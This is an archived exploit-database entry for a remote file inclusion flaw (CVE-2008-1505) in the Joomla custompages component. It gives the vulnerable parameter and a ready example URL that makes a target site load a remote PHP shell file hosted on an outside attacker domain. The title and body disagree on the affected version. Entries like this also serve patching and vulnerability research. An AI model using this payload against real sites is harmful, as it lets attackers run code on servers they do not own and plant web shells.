joomla components custompages 1.1 - Remote File Inclusion Vulnerability

2008-03-22T00:00:00
ID EDB-ID:5294
Type exploitdb
Reporter Sniper456
Modified 2008-03-22T00:00:00

Description

Joomla Components custompages 1.1 Remote File Inclusion Vulnerability. CVE-2008-1505. Webapps exploit for php platform

                                        
                                            @ JOOmla Component custompages <= 1.0 Sql Remote file Inclusion


Author:Sniper456

Contact:Sniper456[attt]gmail.com

Greetss: My chilean people

Developer: Shawn Sandy

License:Other open source / Free license

Dork: 8=====B !           =)

**Bug:

http://www.target.com/index.php?option=com_custompages&cpage=URL

**Example

http://www.target.com/index.php?option=com_custompages&cpage=http://atackweeb.cl/colocoloshell.txt?

side note:

 <name>custompages</name>
 <creationDate>06/11/2006</creationDate>
 <author>Shawn Sandy</author>
 <copyright>Copyright 2006 - Shawn Sandy</copyright>
 <license>License</license>
 <authorEmail>shawnsandy04@gmail.com</authorEmail>
 <authorUrl>www.sstreamtv.com</authorUrl>
 <version>1.1</version>

# milw0rm.com [2008-03-22]